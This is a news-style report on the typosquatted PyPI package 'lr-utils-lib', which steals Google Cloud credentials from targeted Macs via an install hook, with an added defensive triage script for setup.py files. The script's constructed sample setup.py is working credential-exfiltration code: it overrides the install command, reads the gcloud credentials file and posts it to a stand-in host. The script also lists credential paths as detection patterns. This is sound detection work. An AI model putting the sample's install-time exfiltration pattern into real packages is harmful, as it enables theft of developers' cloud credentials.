Malicious PyPi Package Steals Google Cloud Credentials from macOS Developers

Researchers have discovered a Python package on the Python Package Index (PyPI) built to steal Google Cloud Platform credentials from a narrow set of macOS users. The package, "lr-utils-lib", appeared on PyPI in early June. The malicious code is hidden in the package's setup file, so it runs when the package is installed rather than when the library is imported. It first checks whether the host is macOS, then reads the machine's IOPlatformUUID, the hardware identifier that uniquely identifies each Mac.

The malware only acts on a predetermined list of 64 machines; why those machines were chosen, and who is behind the package, remain unknown. The package name closely resembles "lr-utils", a legitimate package used in deep-learning and neural-network work, in the pattern typical of typosquatting. Dark Reading has reached out to Checkmarx for insight into the likely targets of this campaign.

On a targeted machine, lr-utils-lib exfiltrates Google Cloud Platform credentials to a remote server. Stolen cloud credentials open the way to follow-on attacks on cloud assets: data theft, planting malware, and introducing vulnerable components that enable lateral movement. Ross Bryant, head of research at Phylum, underscores how severe the risk is when criminals obtain credentials that carry broad rights and privileges.

A notable aspect of the campaign is its social-engineering layer. The package owner, using the name "Lucid Zenith", claims on LinkedIn to be the CEO of Apex Companies LLC. Although the real CEO's profile exists, AI search tools such as Perplexity have returned Lucid Zenith as the company's legitimate CEO. That error illustrates how little AI-powered tools can be relied on to verify identities.

Malicious packages are a common threat: they pose as legitimate software components while carrying a payload, usually aimed at data theft. What sets lr-utils-lib apart is how narrowly it targets its victims through open-source software. Malicious npm packages attributed to North Korean actors have shown similarly targeted behaviour, but such precision remains rare. Dark Reading has asked Checkmarx for further details on the current status of lr-utils-lib.

To avoid pulling in targeted packages, organizations should treat every dependency upgrade as a point of exposure: verify where a package comes from and inspect what it contains, in particular any setup script, since that code runs at install time. Checkmarx recommends scrutinizing package sources, verifying setup-script contents, and fostering a culture of critical thinking about what gets installed.
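The passages above describe what the package does at install time (a setup-file hook, a macOS check, an IOPlatformUUID lookup, an allow-list of 64 machines, and credential upload) and recommend inspecting setup scripts before installing. The following static triage script, an added example that is not code from the article, Checkmarx, Dark Reading or the lr-utils-lib package, parses a setup.py with Python's `ast` module and flags exactly those behaviours: a setuptools command override or `cmdclass` registration, `ioreg`/IOPlatformUUID strings, process spawning, outbound HTTP, dynamic code execution, and references to the Google Cloud SDK's standard credential files under `~/.config/gcloud` (an assumption about where gcloud keeps credentials, not something the article states). The sample setup.py it runs on is constructed to mimic the described behaviour with placeholder values; the real target list and exfiltration endpoint are not on this page and are not reproduced.

```python
"""Static triage of a sdist's setup.py for the install-time behaviour described
in the article.  Added example, not code from Checkmarx, Dark Reading or the
lr-utils-lib package; it parses the file with `ast` and never executes it."""
import ast

# setuptools/distutils command classes whose run() executes during `pip install`.
INSTALL_HOOKS = {"install", "develop", "egg_info", "build_py", "build_ext"}
# String literals to flag.  The gcloud paths are the Google Cloud SDK's standard
# credential locations (an assumption here, not something the article states).
SUSPICIOUS_STRINGS = {
    "IOPlatformUUID": "macOS hardware UUID lookup",
    "ioreg": "ioreg invocation (macOS I/O registry)",
    ".config/gcloud": "gcloud configuration directory",
    "application_default_credentials.json": "gcloud application default credentials",
    "credentials.db": "gcloud credential store",
}
# Calls to flag: a key ending in "." matches any call under that module prefix,
# any other key must match the fully qualified call name exactly.
SUSPICIOUS_CALLS = {
    "subprocess.": "spawns a subprocess",
    "os.system": "spawns a shell",
    "urllib.request.": "outbound HTTP via urllib",
    "requests.": "outbound HTTP via requests",
    "platform.system": "OS fingerprinting",
    "exec": "dynamic code execution",
    "base64.b64decode": "decodes an embedded blob (common obfuscation)",
}


def _aliases(tree):
    """Map local names to what they import, so that after `from urllib import
    request` the call request.urlopen() resolves to urllib.request.urlopen."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[a.asname or a.name.split(".")[0]] = a.name if a.asname else a.name.split(".")[0]
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _qualname(node, aliases):
    """Fully qualified 'pkg.mod.attr' for a Name/Attribute chain, '' otherwise."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return ""
    parts.append(aliases.get(node.id, node.id))
    return ".".join(reversed(parts))


def triage_setup_py(source):
    """Return a list of findings for the setup.py text; an empty list means nothing flagged."""
    tree = ast.parse(source)
    aliases = _aliases(tree)
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                parts = _qualname(base, aliases).split(".")
                if parts[0] in ("setuptools", "distutils") and parts[-1] in INSTALL_HOOKS:
                    findings.append(f"class {node.name} subclasses {'.'.join(parts)}: code runs at install time")
        elif isinstance(node, ast.Call):
            name = _qualname(node.func, aliases)
            if name.endswith("setup") and any(k.arg == "cmdclass" for k in node.keywords):
                findings.append("setup() passes cmdclass: custom commands run at install time")
            for key, why in SUSPICIOUS_CALLS.items():
                if name == key or (key.endswith(".") and name.startswith(key)):
                    findings.append(f"call {name}: {why}")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for needle, why in SUSPICIOUS_STRINGS.items():
                if needle in node.value:
                    findings.append(f"string {needle!r}: {why}")
    return findings


def is_high_risk(findings):
    """Worth blocking pending manual review: an install-time hook combined with
    process spawning, network I/O or dynamic code execution."""
    return any("install time" in f for f in findings) and any(f.startswith("call ") for f in findings)


# Constructed sample mimicking the described behaviour with placeholder values:
# install hook, macOS check, IOPlatformUUID lookup, allow-list, gcloud upload.
SAMPLE_MALICIOUS = '''
import os, platform, subprocess
from urllib import request
from setuptools import setup
from setuptools.command.install import install
TARGETS = {"00000000-0000-0000-0000-000000000000"}  # placeholder allow-list
def hw_uuid():
    out = subprocess.check_output(["ioreg", "-rd1", "-c", "IOPlatformExpertDevice"]).decode()
    return next(l.split('"')[-2] for l in out.splitlines() if "IOPlatformUUID" in l)
class Hook(install):
    def run(self):
        install.run(self)
        if platform.system() == "Darwin" and hw_uuid() in TARGETS:
            cred = os.path.expanduser("~/.config/gcloud/application_default_credentials.json")
            request.urlopen("https://example.invalid/up", data=open(cred, "rb").read())
setup(name="constructed-sample", version="0.0.1", cmdclass={"install": Hook})
'''
```

To use it on a real package, fetch the source distribution without installing it (`pip download --no-deps --no-binary :all: <name>`), unpack the archive, and pass the contents of its setup.py to `triage_setup_py`. Running it on `SAMPLE_MALICIOUS` reports the install hook, the `cmdclass` registration, the `subprocess`, `platform.system` and `urllib.request.urlopen` calls, and the `ioreg`, `IOPlatformUUID` and gcloud strings, and `is_high_risk` returns True; a plain `setup(name=..., packages=find_packages())` yields no findings. The check is deliberately static and string-based, so it will miss payloads assembled at runtime; treat an `exec` or `base64.b64decode` hit in a setup script as a reason to read the whole file rather than as noise.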

The discovery of lr-utils-lib shows how targeted software-supply-chain attacks have become, and why organizations must proactively protect their cloud assets. Vigilance, critical thinking, and strict verification of packages before they are installed remain the main defences against malicious packages in the software supply chain.
